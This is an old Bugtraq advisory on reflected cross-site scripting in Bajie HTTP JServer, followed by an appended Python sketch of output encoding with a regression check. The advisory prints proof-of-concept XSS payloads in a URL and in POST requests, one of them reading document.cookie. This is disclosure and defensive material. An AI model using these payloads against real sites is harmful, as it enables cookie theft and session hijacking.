CSS Vulnerability in Bajie HTTP JServer

From: Oliver Karow (Oliver.Karow_at_gmx.de)
Date: 10/16/03

    Date: Thu, 16 Oct 2003 10:55:08 +0200 (MEST)
    To: bugtraq@securityfocus.com
    
    

    CSS Vulnerability in Bajie HTTP JServer
    ==========================

    Even though the cross-site scripting vulnerability published under BID 7344
    was fixed with Build 0.95zxe1, the current version of Bajie HTTP JServer is
    still vulnerable to cross-site scripting attacks.

    Vulnerable versions:
    ====================

    The latest version BajieJSrv/0.95zxv4 and probably older ones.

    Exploiting:
    ===========

    The cross-site scripting vulnerability can easily be demonstrated with a web
    browser:
     
       http://localhost/cgi/bin/test.txt?>alert(document.cookie)</script>

    The following CSS's can be demonstrated either by inserting code into the
    HTML forms with a browser, or by sending a string like the following via
    netcat:

      POST /servlet/custMsg?guestName=<script>alert("bang")</script> HTTP/1.0

      POST /servlet/CookieExample?cookiename=<script>alert("bang")</script>&cookievalue=&cookiepath= HTTP/1.0

    Vendor:
    =======

    Name: Gang Zhang (gzhangx@hotmail.com)
    Homepage:
    http://go.to/bajie

    Discovered by/Credit:
    =====================

    16.10.2003 Oliver Karow (oliver.karow[at]gmx.de)

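The fix for both reflection points in the advisory is output encoding, sketched here as an added example that is not part of the original post and not Bajie's code. The page templates and function names are hypothetical, since the advisory does not show how the server builds its responses; only the request targets are taken from it.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qsl

# Request targets copied from the advisory; the payloads are its own alert() demos.
ADVISORY_TARGETS = [
    '/cgi/bin/test.txt?>alert(document.cookie)</script>',
    '/servlet/custMsg?guestName=<script>alert("bang")</script>',
    '/servlet/CookieExample?cookiename=<script>alert("bang")</script>'
    '&cookievalue=&cookiepath=',
]


def render_param_page(target: str, encode: bool = True) -> str:
    """Hypothetical servlet page that echoes every submitted parameter.

    encode=False reproduces the reflected behaviour the advisory reports;
    encode=True HTML-encodes names and values before they reach the page.
    """
    out = (lambda s: html.escape(s, quote=True)) if encode else (lambda s: s)
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    items = "".join(f"<li>{out(k)} = {out(v)}</li>" for k, v in pairs)
    return f"<html><body><ul>{items}</ul></body></html>"


def render_error_page(target: str) -> str:
    """Hypothetical error page that echoes the whole request target, encoded."""
    return f"<html><body><p>Not found: {html.escape(target, quote=True)}</p></body></html>"


class _TagCollector(HTMLParser):
    """Records every start tag an HTML parser sees in a rendered page."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def script_tags(page: str) -> int:
    """Number of <script> elements a parser finds in the page."""
    collector = _TagCollector()
    collector.feed(page)
    collector.close()
    return collector.tags.count("script")
```

Running `script_tags` over the rendered pages for the advisory's three requests makes a small regression check: the count must be zero whenever encoding is on.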